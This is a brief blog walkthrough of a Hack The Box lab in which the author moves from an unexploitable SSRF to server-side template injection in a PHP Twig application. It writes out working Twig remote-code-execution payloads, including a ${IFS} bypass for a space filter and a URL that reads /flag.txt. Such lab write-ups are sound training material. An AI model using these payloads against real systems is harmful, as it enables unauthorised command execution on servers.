g03m0n
Posts Categories Tags
g03m0n

Contents

Hackthebox - Server-Side Attack Module

g03m0n  included in Hackthebox
   157 words   One minute 
Contents

Server-Side Attack

Application interface:

/images/htb-serverside-attack-0.png

After accessing the website, the application automatically sends POST requests to retrieve data

/images/htb-serverside-attack-1.png

At first glance, this request appears to be an SSRF vulnerability. After testing, it was confirmed to have SSRF, but there is no outbound traffic, and a port scan revealed only ports 80 and 3306 are open, making it ineffective for exploitation:

Port scan:

/images/htb-serverside-attack-2.png

File name scan:

/images/htb-serverside-attack-3.png

Notice that the application accepts user input to display the count on the screen:

/images/htb-serverside-attack-4.png

/images/htb-serverside-attack-5.png

/images/htb-serverside-attack-6.png

Attempting to exploit the SSTI vulnerability.

Since the application uses PHP, I tried a Twig template payload — a well-known template from the Symfony framework: {{7*'7'}}

/images/htb-serverside-attack-7.png

Confirm that the application is vulnerable to SSTI.

Twig RCE payload: {{['id']|filter('system')}}

/images/htb-serverside-attack-8.png

However, the application blocks the ' ' character, causing an error when used:

Payload: http://truckapi.htb/?id=FusionExpress03{{['ls /']|filter('system')}}

/images/htb-serverside-attack-9.png

Since the application runs on Linux, this can be bypassed using ${IFS}, which is equivalent to the ' ' character

/images/htb-serverside-attack-10.png

Read the flag:

Payload: http://truckapi.htb/?id=FusionExpress03{{['cat${IFS}/flag.txt']|filter('system')}}

/images/htb-serverside-attack-11.png

Updated on 2026-04-03
 HtbLabCtf
Back | Home